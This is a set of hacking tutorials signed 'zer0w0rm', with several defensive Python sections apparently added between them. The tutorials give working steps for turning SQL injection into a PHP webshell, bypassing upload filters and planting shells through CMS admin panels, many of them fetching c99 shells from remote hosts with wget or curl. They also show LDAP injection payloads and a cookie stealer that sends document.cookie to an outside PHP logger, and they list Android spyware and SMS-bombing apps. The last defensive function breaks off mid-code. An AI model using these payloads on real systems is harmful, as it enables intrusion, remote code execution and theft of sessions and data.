HOW TO UPLOAD A SHELL DIRECTLY THROUGH SQL INJECTION


First of all, find a website that is vulnerable to SQL injection. You can find websites with dorks or manually, like I found this one.

You need 2 main things:

- Root path of the website
- A writable directory

Most of the time, you will see the root path in an SQL error of the site, like the following one.

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in /home/zero/public_html/admin/requires/functions.php on line 1327

Well, if the vulnerable website doesn't show the root path, don't worry; I will show you how to find the root path, and also a writable directory.

www.site.com/index.php?id=10'

I am not starting with the ABC of SQLi; I hope you know the basics.
Now we have to find the number of columns of the website and then the vulnerable column(s). My site has 5 columns and 3 is the vulnerable column.

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,version(),4,5--

Let's Try To Load Files Of The Website

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/passwd'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/my.cnf'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/group'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/services'),4,5--

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/hosts'),4,5--

We won't need to read any of the files mentioned above; they are just to increase your knowledge. Now we have to check the file privileges of the current user, and for this you first have to find the current username, like this:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,current_user,4,5--

Our current username is shown in the vulnerable column; mine is zer0w0rm.
Now check the file privileges for user zer0w0rm:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,file_priv,4,5 FROM mysql.user WHERE user='zer0w0rm'--

If it shows Y (yes) in the vulnerable column of the website, that means the current user zer0w0rm has the FILE privilege.
If it doesn't show Y, then don't waste your time there :D

OK, now we need to know the root path for this web server, and for that we need to know the web server type. You can use the Firefox add-on Server Spy for this.

Server Spy add-on: https://addons.mozilla.org/en-us/firefox/addon/server-spy/
You can use Havij or some other tool to detect the web server type, too.

To identify the web server from the file /etc/passwd, use this query:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,3,load_file('/etc/passwd'),5--

Now we have our web server's user, e.g. /home/zero0w0rm.
Now read one more file:

www.site.com/index.php?id=-10 UniOn SeleCt 1,2,load_file('/etc/zero0w0rm.conf'),4,5--

Where zero0w0rm is your web server software name, i.e. servername.conf.

Now we have the root path, e.g.

/home/site.com/public_html

Now we have to find a writable directory. For this you can use Google dorks as well as your own knowledge :D

site www.site.com/dir/*/*/*/*/

So it's site.com/zero0w0rm/writeable

Now we will upload our evil code:

www.site.com/index.php?id=10 UniOn SeleCt 1,2,"<?system($_REQUEST['cmd']);?>",4,5 into outfile '/home/site/public_html/zero0w0rm/writeable directory/zero0w0rm.php'--+

OK, now we have to execute our commands:

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=pwd

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=uname -a

Now we will use the wget command to pull our evil script onto the server:

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=wget http://www.shellsite.com/c99.txt

Now we will rename c99.txt to .php in order to execute it :D

www.site.com/zero0w0rm/writeable directory/zero0w0rm.php?cmd=mv c99.txt c99.php

Now open it:

www.site.com/zero0w0rm/writeable directory/c99.php VOILA, OUR SHELL IS LIVE :D

Note: In our experience, Windows servers are easy to shell with SQL queries.
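From the defender's side, the requests above leave a distinctive trail in the web server access log. The following Python script is an added example (not part of the original tutorial) that normalises the request path (URL-decoding, comment stripping, case folding) and flags the UNION SELECT, load_file(), INTO OUTFILE and FILE-privilege probes described above; the log lines are constructed samples in combined log format.

```python
import re
from urllib.parse import unquote_plus

# Combined-log-format request line; the path is the only field we inspect.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Each signature maps to one step of the tutorial above. Matching is done on
# the normalised path, so case tricks (UniOn SeleCt) and inline comments do not help.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b[\s(]+(?:all\s+)?select\b"),
    "file_read": re.compile(r"\bload_file\s*\("),                 # load_file('/etc/passwd')
    "file_write": re.compile(r"\binto\s+(?:out|dump)file\b"),     # INTO OUTFILE '.../x.php'
    "priv_probe": re.compile(r"\bfile_priv\b|\bmysql\.user\b"),   # FILE privilege lookup
}


def normalize(raw_path):
    """URL-decode (twice, to cover double encoding), drop /* */ comments,
    collapse whitespace and lower-case the request path."""
    s = raw_path
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


def classify(raw_path):
    """Return the sorted list of signature names that fire on this path."""
    text = normalize(raw_path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan(log_text):
    """Return one finding per log line that matches at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m.group("path"))
        if tags:
            findings.append({"ip": m.group("ip"), "path": m.group("path"),
                             "status": m.group("status"), "tags": tags})
    return findings


# Constructed sample log (not real traffic); the requests mirror the tutorial's shapes.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php?id=10 HTTP/1.1" 200 5120
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,version(),4,5-- HTTP/1.1" 200 4102
203.0.113.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?id=-10%20UniOn%20SeleCt%201,2,load_file('/etc/passwd'),4,5-- HTTP/1.1" 200 6000
203.0.113.5 - - [10/Oct/2023:13:57:20 +0000] "GET /index.php?id=10%20UniOn%20SeleCt%201,2,%22%3C?system($_REQUEST['cmd']);?%3E%22,4,5%20into%20outfile%20'/home/site/public_html/x.php'--+ HTTP/1.1" 200 4102
203.0.113.5 - - [10/Oct/2023:13:58:01 +0000] "GET /x.php?cmd=uname%20-a HTTP/1.1" 200 300
198.51.100.7 - - [10/Oct/2023:14:00:00 +0000] "GET /index.php?id=42 HTTP/1.1" 200 5120
"""

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ip"], f["status"], ",".join(f["tags"]), f["path"])
```

On the database side the whole chain depends on the application user holding the FILE privilege and on secure_file_priv allowing writes into the web root; an application account without FILE stops the INTO OUTFILE step regardless of the injection.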


Thank you (zer0w0rm)
 

Android Pen-testing tools

ANDROID PENTEST SUITE
ANDROID NETWORK TOOLKIT

Award-winning mobile penetration testing tool specifically built for smartphones. zANTI is the currently released version of the code-named ANTI (Android Network Toolkit). After over a year of beta testing with approximately 100,000 IT managers and penetration testers around the globe, ANTI is the first penetration testing framework for mobile devices. To further develop the current security tests, which must be performed in a comprehensive professional pentest, Zimperium is going to slowly open-source parts of zANTI.

ANDROID SPY AGENT
TOTAL SMS CONTROL

The Best Mobile Spy Software for Spouse monitoring, Parental Control, Employee Tracking, Phone Security and Locator.

AGASTYA

Having Agastya installed on your phone magically allows you to access your mobile remotely. You can access and retrieve a lot of data from your mobile phone even if you don’t have it with you. The data which can be fetched includes 1) Contacts (fetching contact numbers from your address book) 2) Call logs (checking missed calls/received calls/dialed numbers) 3) IMEI number 4) Phone profile (changing profile mode to Ringer or Silent) 5) SIM number (retrieving the SIM number) 6) SMS logs (checking SMSs received on your phone).

SESSION HIJACKING
DROIDSHEEP

DroidSheep [Root] is an Android app for security analysis in wireless networks and capturing Facebook, Twitter, LinkedIn and other accounts. DroidSheep was developed as a tool for testing the security of your accounts and is based on my Bachelor thesis titled “Session Hijacking on Android Devices”.

FACESNIFF

FaceNiff is an Android app that allows you to sniff and intercept web session profiles over the WiFi that your mobile is connected to. It is possible to hijack sessions only when the WiFi is not using EAP, but it should work over any private network (Open/WEP/WPA-PSK/WPA2-PSK). It's kind of like Firesheep for Android, maybe a bit easier to use (and it works on WPA2!).

DOS ATTACK
ANDOSID

AnDOSid allows security professionals to simulate a DoS attack (an HTTP POST flood attack, to be exact) and of course a DDoS on a web server, from mobile phones.

SMS BOMBER

Bomb your friends with a lot of SMS in a short period. Features:
- Unlimited number of texts
- Flood multiple contacts
- Cancel button
- No delay or periodic sending
- Remember last config
- Easily select contacts
- Counter to make each SMS different (add the counter to each text via menu/Counter)
Download Anti SMS Bomber before bombarding :)

CONNECT & SCAN
SSHDROID

Connect through SSH to your device! SSHDroid is an SSH server implementation for Android. This application will let you connect to your device from a PC and execute commands (like "terminal" and "adb shell") or edit files (through SFTP, WinSCP, Cyberduck, etc.).

FING

Fing is the ultimate toolkit for network management:
* Network discovery
* Service scan (TCP port scan)
* Ping
* Traceroute
* DNS lookup
* Wake on LAN
* Fingbox (sync, backup, merge, monitor, notifications)
* TCP connection tester
* MAC address and vendor gathering
* Customizable host names and icons
* Connectivity detection
* Geolocation
* Integrated launch of third-party apps for SSH, Telnet, FTP, FTPS, SFTP, SCP, HTTP, HTTPS, SAMBA

TENABLE NESSUS

The Nessus Android app, from Tenable Network Security Inc., enables you to log into your Nessus scanners and start, stop and pause vulnerability scans as well as analyze the results directly from your Android device. This mobility helps improve the efficiency of your incident response process by letting you quickly log into a Nessus scanner from your phone to search previous scan results or check the status of an ongoing scan.

HACK A DROID

This is a little suite of homemade implementations of security tools for Android, composed of a router password cracker, a utility that scans for hosts in your LAN, a port scanner and a service banner grabber.

ANDROID TERMINAL EMULATOR

Access your Android's built-in Linux command line shell. Unleash your inner geek!

SNIFFERS
SHARK FOR ROOT

Traffic sniffer; works on 3G and WiFi (works in FroYo tethered mode too). To open the dump use Wireshark or similar software; to preview the dump on the phone use Shark Reader. Based on tcpdump.

SHARK READER

Application for reading pcap files. Possible instability/errors; has problems with large files. Suggestions and comments are welcome. If you want traffic tagging functionality (tags packets to mark possible content), run Shark Updater. Filters: type a name to include it, type -name to exclude it from the list.

ANONYMITY
ORBOT

Enhance your privacy, break through firewalls and communicate more safely. Orbot is the official port of Tor to Android. Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet.

Note: all apps are available on the Play Store; you can download them from there.

Thank you (zer0w0rm)
 

Shell Uploading Guide

Many newbies face problems while uploading a shell on a site after getting admin access / logging in to that site. So I am writing this in order to help them. Basically a shell gives us remote access to that server. Such shells are available in different languages like PHP, ASP/ASPX, CGI etc. So we have to choose a shell that will work on the server according to the server script: if the server supports PHP, then we choose a PHP shell; otherwise ASP or CGI. Now let's come to the main point. AFTER LOGGING IN TO THE SITE, IF WE FIND ANY UPLOAD OPTION IN THE SITE, THEN WE CAN EASILY UPLOAD A SHELL. But sometimes we have to make some changes to upload a shell.

Way 1
AS THE SHELL IS IN PHP FORMAT, SOMETIMES SOME SITES DO NOT ALLOW UPLOADING SUCH SCRIPTS DIRECTLY WITH THE PHP EXTENSION. If that happens, just rename the shell: add .gif/.jpg/.html/.doc etc. Example: suppose before renaming the shell name was shell.php; then we rename it to shell.php.jpg or anything else.

Way 2
Upload a simple uploader shell first that isn't detected by antivirus and firewalls. THEN UPLOAD YOUR SHELL THROUGH YOUR OWN SHELL. YOU CAN DOWNLOAD AN UPLOADER SHELL FROM HERE.

WAY 3
SOME SERVER FIREWALLS DETECT THE SHELL SCRIPT BY CHECKING THE headers and don't allow us to upload a shell. We can bypass it by using the “GIF89a SHELL SCRIPT BYPASS” method: open your shell in Notepad and add “GIF89a;” without quotes before the shell code starts, like below:
GIF89a;
Depending on what kind of file validation they are using, this may fool the server into thinking it's an image, since when it reads the file it finds the GIF header and assumes it's safe because it's an image.

WAY 4
This method is more advanced. It only works against client-side filters, not server-side ones. Download Firebug for Firefox, then edit the HTML of the upload form:
<form enctype="multipart/form-data" action="uploader.php" method="POST"> Upload DRP File: <input name="Upload Saved Replay" type="file" accept="*.jpg"/><br /> <input type="submit" value="Upload File" /> </form>

Change the accept filter to *.* or just remove it completely; it will then let you upload any type of file.

WAY 5
Download the “Live HTTP Headers” add-on for your Firefox browser first.

1. Rename your shell to shell.php.jpg (or whatever that site supports. In my case, the site supports only jpg files; that's why I renamed it to shell.php.jpg.)

2. Open Firefox and start your Live HTTP Headers add-on; after that, upload your shell.

3. Your Live HTTP Headers window will then look something similar to this:


4. Then click on the shell.php.jpg request, and after that click on the Replay button.

5. A new window will open with two boxes; we have to work in the second box.

6. In the second box, rename shell.php.jpg to shell.php, then click on the Replay button again.


WAY 6 
Find yourself a copy of edjpgcom.exe. "edjpgcom is a free Windows application that allows you to change (or add) a JPEG comment in a JPEG file." Usage: edjpgcom "filename.jpg". Now add this to the JPEG comment, since you won't be able to drop a whole shell in there due to size limits etc.:
"; system($_GET['cmd']); echo ?>

Now rename your .jpg to .php and upload.

WAY 7 
Another way you can fool the web server into thinking you're uploading an image instead of a PHP shell is to get Firefox and install the “Tamper Data” add-on, then click Start Tamper, upload your PHP shell, tamper the data and change the Content-Type from 'application/octet-stream' to 'image/jpeg'. If you have any problem uploading a shell using Tamper Data, just do a simple Google search; many video tutorials on this are available on the web, so I am not explaining it step by step.

WAY 8 
All the above-mentioned ways work when we find an upload button on the site. When there is no upload button, it's not easy to upload a shell there, but we can try a few things. We have to find out if there is an edit option for an existing php/asp/aspx page. If there is, open that page and delete the whole script. After that, open your shell in Notepad, copy the script, paste it into that page and finally save it. Now that link will be your shell. We can possibly find an edit option in the following pages of a site:
Contact us.php/ Contact us.asp 
Class.php/ Class.asp 
About us.php/about us.asp 
Terms.php/terms.asp 
NB: some news, vehicle-selling, cart etc. sites don't have any option to upload a file after logging in through the admin panel. They only allow file upload after logging in through cPanel.

WAY 9 
SOMETIMES, IN SOME REMOTE FILE INCLUSION VULNERABLE SITES, WE HAVE TO EXECUTE A SHELL FROM ANOTHER HOSTING SITE. METHOD:

1) UPLOAD YOUR SHELL TO A FREE HOSTING SITE LIKE www.my3gb.com, www.3owl.com, www.ripway.com, www.000webhost.com, etc.

2) Now suppose your shell link is www.example.my3gb.com/c99.txt & YOUR VULNERABLE SITE IS www.site.com

3) Now we have to request the following URL to gain shell access to that site: http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt

4) REPLACE THE SITE LINKS IN THE URL ACCORDING TO YOUR SHELL & VULNERABLE SITE LINKS.
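The server-side checks that close each of the upload bypasses above (Way 1 to Way 7), as an added Python example written for this page and not code from the guide or any product: it looks at every dotted part of the file name (Way 1, Way 5), ignores the client-sent Content-Type (Way 7), requires the magic bytes to match the claimed extension (Way 3) and refuses files containing a PHP open tag (Way 6). The stored name is chosen by the server so the uploader never controls the extension; the file bytes used for testing are constructed samples.

```python
import os
import re
import secrets

# Magic bytes per accepted extension. A 'GIF89a;' prefix (Way 3) passes this
# check only when the claimed extension really is .gif, and the PHP tag check
# below still rejects it.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Extensions the web server could execute; 'shell.php.jpg' is caught because
# every dotted part of the name is checked, not only the last one (Way 1, Way 5).
SCRIPT_EXT = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
              "asp", "aspx", "cgi", "pl", "jsp", "htaccess"}
PHP_TAG = re.compile(rb"<\?php|<\?=", re.IGNORECASE)
MAX_BYTES = 5 * 1024 * 1024


def validate_upload(filename, data, client_content_type=None):
    """Return (True, extension) or (False, reason).

    client_content_type is accepted only so callers can log it; it is
    attacker-controlled (Way 7) and deliberately never used for a decision."""
    if not filename or "\x00" in filename:
        return False, "bad file name"
    base = os.path.basename(filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):
        return False, "bad file name"
    ext = parts[-1]
    if ext not in MAGIC:
        return False, "extension not allowed"
    if any(p in SCRIPT_EXT for p in parts[:-1]):
        return False, "script extension inside file name"
    if len(data) > MAX_BYTES:
        return False, "file too large"
    if not data.startswith(MAGIC[ext]):
        return False, "magic bytes do not match extension"
    if PHP_TAG.search(data):
        # Way 6: code hidden in a JPEG comment. Re-encoding the image with an
        # image library before storing it removes such comments entirely.
        return False, "embedded php tag"
    return True, ext


def storage_name(ext):
    """Random server-chosen file name; the uploader's name is never reused."""
    return secrets.token_hex(16) + "." + ext
```

Store the result outside the web root (or in a directory where script execution is disabled) and serve it through a handler that sets the Content-Type from the validated extension, not from the upload.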

SHELL UPLOADING IN joomla, wp, vb, smf, ipb, mybb SITES


IN THE ABOVE-MENTIONED SITES WE GENERALLY CAN'T FIND A DIRECT UPLOAD OPTION, SO WE HAVE TO DO IT IN OTHER WAYS.

1.Joomla Site: 
After logging into the admin panel you will find Extensions as the 5th menu item. Expand it and click Template Manager > check any template (like beez, ja_purity). Now click on Edit (upper right side); after this click on Edit HTML, paste your shell code and click Save. Done: site.com/templates/template name/index.php, like site.com/templates/beez/index.php

2.Wordpress: 
Log into the admin panel and expand Appearance, then click on Editor > you will find style.css. Now select 404.php on the right side, paste your shell code and click Edit File. You can find the shell at site.com/wp-content/themes/theme name you edited/404.php

3.Vbulletin: 
1- Log in to the admin CP.

2- Under “Plugins & Products”, select Add New Plugin.

3- Adjust the settings as follows:
Product: vBulletin
Hook Location: global_start
Title: (anything)
Execution Order: 5
Code:
ob_start(); system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean();

Plugin is Active: Yes

4- After the plugin is added, go to the heading “Style and Design” and select “Style Manager”.

5- Under whatever the default style is in the dropdown menu, select Edit Templates.

6- Scroll to the ForumHome templates and expand them. Click [Customize] beside FORUMHOME.

7- Search for the code:
$header
somewhere near the top. Replace it with:
$header $execcode

8- Now go to the forum and add after index.php:
?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

So it looks like:
http://www.site.com/pathtoforum/index.php?cmd=wget http://www.site.com/shell.txt;mv shell.txt shell.php

What this does is download shell.txt and rename it to shell.php. Now the shell should be located in the forum directory as shell.php. If not, then wget is disabled on that server and you can try alternative methods:
http://www.site.com/pathtoforum/index.php?cmd=curl http://www.site.com/shell.txt > shell.php

http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php


4.SMF
Log into the admin panel. You need to download any SMF theme in zip format, put your shell.php in it and save it. Admin panel > select Themes and Layout > Install a new theme > browse and upload the theme that has our shell.php :) After upload the shell will be found at site.com/Themes/theme name/shell.php

5.IPB
Log into the admin panel > Look and Feel > Manage Languages, choose a language > section (example) public_help, edit help.txt. Choose a topic from the list, or search for a topic. In the right box add the code below:
${${print $query='cd cache; wget http://link_to_shell/shell.txt;mv shell.txt shell.php'}} ${${system($query,$out)}} ${${print $out}}

When you add it, click Go at the bottom. Now we go to http://www.site.com/index.php?app=core&module=help and the code we added will be executed, and you will get your shell at www.site.com/cache/shell.php

6.phpBB
Log into the admin panel > go to Styles -> Templates -> Edit; for Template file choose faq_body.html. At the bottom of:
we add:
fwrite(fopen($_GET[o], 'w'), file_get_contents($_GET[i]));
and save it. Now go to:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt
The shell will be found at site path/shell.php

MyBB forum: log into the admin CP > go to Templates and Styles and find which theme is the default MyBB theme. Then go to Templates and expand the templates that are used by the current theme. Find Calendar Templates and click it. Click 'calendar'. Above all the HTML code, paste this:


Save :) The shell will be found at site.com/calendar.php
Note: if you get an error like "code is dangerous, unable to edit", then simply paste your deface code to deface calendar.php

Thank you (zer0w0rm)
 

LDAP (Lightweight Directory Access Protocol) injections

In this tutorial I'll be discussing how an LDAP injection attack works.

-[ INDEX ]-----------------------------------------------
 0x01: Introduction
 0x02: Filters LDAP
 0x03: LDAP injection in Web Applications
 0x04: Links
           
           
---[ 0x01: Introduction ]

LDAP (Lightweight Directory Access Protocol) is a lightweight protocol for accessing
X.500 directory services. It runs over TCP/IP and is used to query and modify the
objects stored in the directory.


---[ 0x02: Filters LDAP ]

   
It is quite important to understand how LDAP filters work (http://tools.ietf.org/html/rfc4515).

Filter      = "(" filtercomp ")"
Filtercomp  = and / or / not / item
And         = "&" filterlist
Or          = "|" filterlist
Not         = "!" filter
Filterlist  = 1*filter
Item        = simple / present / substring
Simple      = attr filtertype assertionvalue
Filtertype  = "=" / "~=" / ">=" / "<="
Present     = attr "=*"
Substring   = attr "=" [initial] "*" [final]
Initial     = assertionvalue
Final       = assertionvalue

   
Logical operators:
- AND "&"
- OR "|"
- NOT "!"

Relational operators:
<=, >=, =, ~=

The wildcard "*" is used to match any sequence of characters.
   
Filter example:
(&(objectClass=user)(uid=*)): returns a list of all objects of type user, whatever
the value of the attribute "uid".


---[ 0x03: LDAP injection in Web Applications ]

LDAP injection is very similar to SQL injection.
The attack technique exploits websites that build LDAP statements directly from
data supplied by the user.

Vulnerable code, with comments:

+++++++++++++++++++++++++++++++++++++

line 0: <html>
line 1: <body>
line 2: <%@ Language=VBScript %>
line 3: <%
line 4:     Dim userName
line 5:     Dim filter
line 6:     Dim ldapObj
line 7:
line 8:     Const LDAP_SERVER = "ldap.example"
line 9:
line 10:     userName = Request.QueryString("user")
line 11:
line 12:     if( userName = "" ) then
line 13:         Response.Write("<b>Invalid request. Please specify a valid user name</b><br>")
line 14:         Response.End()
line 15:     end if
line 16:
line 17:
line 18:     filter = "(uid=" + CStr(userName) + ")"        ' searching for the user entry
line 19:
line 20:
line 21:     'Creating the LDAP object and setting the base dn
line 22:     Set ldapObj = Server.CreateObject("IPWorksASP.LDAP")
line 23:     ldapObj.ServerName = LDAP_SERVER
line 24:     ldapObj.DN = "ou=people,dc=spilab,dc=com"
line 25:
line 26:     'Setting the search filter
line 27:     ldapObj.SearchFilter = filter
line 28:
line 29:     ldapObj.Search
line 30:
line 31:     'Showing the user information
line 32:     While ldapObj.NextResult = 1
line 33:         Response.Write("<p>")
line 34:
line 35:         Response.Write("<b><u>User information for : " + ldapObj.AttrValue(0) + "</u></b><br>")
line 36:         For i = 0 To ldapObj.AttrCount -1
line 37:             Response.Write("<b>" + ldapObj.AttrType(i) + "</b> : " + ldapObj.AttrValue(i) + "<br>" )
line 38:         Next
line 39:         Response.Write("</p>")
line 40:     Wend
line 41: %>
line 42: </body>
line 43: </html>

+++++++++++++++++++++++++++++++++++++


In line 10 note that the userName variable is initialized with the value of
the parameter user and then quickly validated to see if the value is empty.
If the value is not empty, the variable userName is used to initialize the
variable filter on line 18.
This new variable is used directly to build an LDAP search, which is assigned to
SearchFilter on line 27.
The attacker has full control over what will be queried on the LDAP server.
The result of the query is obtained when the code reaches lines 32 to 40, where
all results and their attributes are displayed to the user.

Example 1:
http://website/ldap.asp?user=*

In this example the character "*" is sent in the parameter "user", which ends up
in the variable filter.
This LDAP statement will match any object that has a uid attribute, so it
shows all users and their information.

Example 2:
http://website/ldap.asp?user=zer0)(|(homedirectory=*)

It will show us the home directory of the user zer0.
You can try these tests against the code above before you leave.
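The fix for line 18 of the ASP code above is to escape the user-supplied value before splicing it into the filter (RFC 4515 section 3 defines the backslash-hex escapes) and, better, to accept only the characters a uid can contain. The Python below is an added example for this page, not the tutorial's code; the uid character policy is an assumption, and the two inputs it is tested with are the tutorial's Example 1 and Example 2.

```python
import re

# RFC 4515 section 3: these characters must appear as backslash + two hex digits
# inside an assertion value.
_ESCAPE = {"*": r"\2a", "(": r"\28", ")": r"\29", "\\": r"\5c", "\x00": r"\00"}
UID_RE = re.compile(r"^[A-Za-z0-9._-]{1,64}$")  # assumed uid policy for this app


def escape_filter_value(value):
    """Escape a string for use as an LDAP assertion value."""
    return "".join(_ESCAPE.get(ch, ch) for ch in value)


def build_uid_filter_unsafe(user):
    """Mirror of line 18 in the tutorial: raw concatenation."""
    return "(uid=" + user + ")"


def build_uid_filter(user):
    """Hardened version: allowlist first, escape second (defence in depth)."""
    if not UID_RE.match(user):
        raise ValueError("uid contains characters outside the allowed set")
    return "(uid=" + escape_filter_value(user) + ")"


def count_open_parens(filter_text):
    """Count unescaped '(' in a filter; a single uid lookup must have exactly one."""
    return len(re.findall(r"(?<!\\)\(", filter_text))
```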


---[ 0x04: Links ]

http://en.wikipedia.org/wiki/Lightweight_Directory_Access_Protocol
http://es.wikipedia.org/wiki/LDAP

http://www.ldapman.org/


Thank you (zer0w0rm)
 

CSRF(Cross-Site Request Forgery) / XSRF Attacks

In this tutorial I'll be discussing how a CSRF or XSRF attack works.
The method is called CSRF as well as XSRF. CSRF stands for Cross-Site Request Forgery; if you say XSRF, the X obviously stands for the "cross", just like in XSS (Cross-Site Scripting).


I will be calling the method CSRF for the rest of the tutorial, because I prefer that term.

Table of Contents:

    1) What is Cross-Site Request Forgery?
    2) How do I find CSRF vulnerabilities?
    3) How to take advantage of the IMG tag?
    4) Keep it Simple
    5) Securing yourself against CSRF
    6) Conclusion

1) What is Cross-Site Request Forgery?

I just told you what CSRF stands for, so it would be unnecessary to say it twice ^^.

When performing a CSRF attack you inject code into a webpage, like on forums or other websites where you can post comments on whatever. The idea is to execute an HTTP request once a user visits the affected webpage; because this attack takes place on the side of the victim (client-side), the request will be executed from the machine of the victim that visits the webpage. If, for example, a user is logged in to YouTube, a link can be crafted and hidden on a forum which logs them out of YouTube.

We can go waaaay further with this by, for example, making a request to a webpage that, upon visiting, makes a few other requests using JavaScript. This could be used to steal information from websites the user is logged in to.

2) How do I find CSRF vulnerabilities?

CSRF vulnerabilities are often found in webpages with low security that allow everyone to make posts and comments (guests can comment). The fun part is that you can create a post that can be seen by everyone visiting that page.

It has to be possible to use HTML or BBCode, though.

The IMG Tag

An IMG tag in HTML (<img>) is often used as follows:

Code:
<img src="http://website.com/myimage.jpg">

As you may know, PHP pages are also able to return images. This makes it possible to do this, for example:

Code:
<img src="http://website.com/my_php_page.php">

If the PHP page my_php_page returns an image, the image will be displayed by the HTML tag.

3) How to take advantage of the IMG tag?

Yeah, so how do we actually do it? Well, as I said, PHP pages can also return images. Let's go to this simple scenario:

You've just found a webpage with the possibility to place comments, and you're able to use HTML within the comments. The website does not check the Referer, and it's possible to use PHP extensions within the IMG tag. You write some PHP code that returns an image but at the same time executes some JavaScript too, which sends the victim to another page. If someone visits the page where you used the IMG tag, a picture will be shown, but at the same time the JavaScript code runs as well. This way you can steal cookies, for example, or even write and post comments under somebody else's name.

Pretend we have the following code:

Code:
<html><head><script type="text/javascript">
    var http = GetXmlHttpObject();
    if(http != null)
    {
      var url = "http://mywebsite.com/cookiestealer.php?cookie=" + document.cookie;
      http.open("GET", url, false);
      http.send(null);
    }

    function GetXmlHttpObject()
    {
      if(window.XMLHttpRequest)
      {
      return new XMLHttpRequest();
      }
      if(window.ActiveXObject)
      {
      return new ActiveXObject("Microsoft.XMLHTTP");
      }
      return null;
    }
</script></head></html>

Note: In this case I did not write PHP code to display an image. This is simple HTML/JS code that makes an HTTP request to a certain page.

If you're a little familiar with JS you can see that an HTTP GET request is made to the page mywebsite.com/cookiestealer.php, with a GET argument that has the value of 'document.cookie'. document.cookie always contains the cookie of the page where the JavaScript code is being executed; in this case it will steal the cookie of the user that visits the page.

On the website I've found, I've uploaded the following code:

PHP Code:
<?php
    $cookie = $_GET['cookie'];
    $ip = $_SERVER['REMOTE_ADDR'];

    $fh = fopen("log.txt", 'a') or die("can't open file");
    fwrite($fh, $cookie . "\n" . $ip . "\n\n");

    fclose($fh);
?>

This PHP code gets the value of the GET argument and the IP address of the person visiting your page. After that, the code appends this information to the file called 'log.txt'.

Every time someone visits the page where I posted the IMG tag linking to a page that executes the JS code, the code will request the cookie stealer and place the cookie in the GET argument.

At last, you can see the cookies flow into your log. ^^

4) Keep it Simple.

In the code above I showed a rather extensive example. Really badly secured websites with bad software have even bigger bugs than that.

For example, you can first install the forum software on your local machine and look at what HTTP GET request you have to make to change the password of the administrator. Pretend it's like the following:

Code:
http://forum.com/admincp/change_admin_pass.php?newpass=mynewpass123

You'd have to send that URL to the administrator in a private message, in an IMG tag. If the administrator reads the message, a request will be made to the above URL and it will change the admin password to mynewpass123.

I have to say, it's often a lot harder than the above example. ^^

5) Protecting yourself against CSRF
You can protect yourself against CSRF attacks by, for example, not loading images. I think this is a little devious, so I'm thinking about making an add-on that blocks all images that don't have an image extension, unless you allow it, of course.
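On the server side, the usual defence against the IMG-tag trick above is to require state-changing actions (like changing the admin password) to be POST requests carrying a secret token that an attacker-controlled page cannot obtain. The Python below is an added example written for this page, not code from the tutorial: an HMAC-based synchronizer token bound to the session id, with constant-time comparison and an expiry, wrapped around a stand-in for the change_admin_pass.php endpoint. The secret key, session id and request dictionary are constructed assumptions.

```python
import hashlib
import hmac
import secrets
import time

# Server-side secret, generated at startup (constructed; in production load it from config).
SECRET_KEY = secrets.token_bytes(32)
TOKEN_MAX_AGE = 3600  # seconds


def make_csrf_token(session_id, now=None):
    """Token = timestamp:HMAC(secret, session_id:timestamp). It is rendered into
    the form as a hidden field; a cross-site page cannot read it."""
    ts = int(time.time() if now is None else now)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return f"{ts}:{mac}"


def verify_csrf_token(token, session_id, now=None):
    """True only if the MAC is valid for this session and the token is not expired."""
    try:
        ts_text, mac = token.split(":", 1)
        ts = int(ts_text)
    except (AttributeError, ValueError):
        return False
    current = int(time.time() if now is None else now)
    if ts > current or current - ts > TOKEN_MAX_AGE:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{ts}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, mac)   # constant-time comparison


def change_admin_password(request, session_id, now=None):
    """Stand-in for change_admin_pass.php. request = {"method": ..., "form": {...}}.
    Returns (status, message). An <img src=...> can only produce a GET without a
    token, so the forged request fails both checks."""
    if request.get("method") != "POST":
        return 405, "state-changing requests must use POST"
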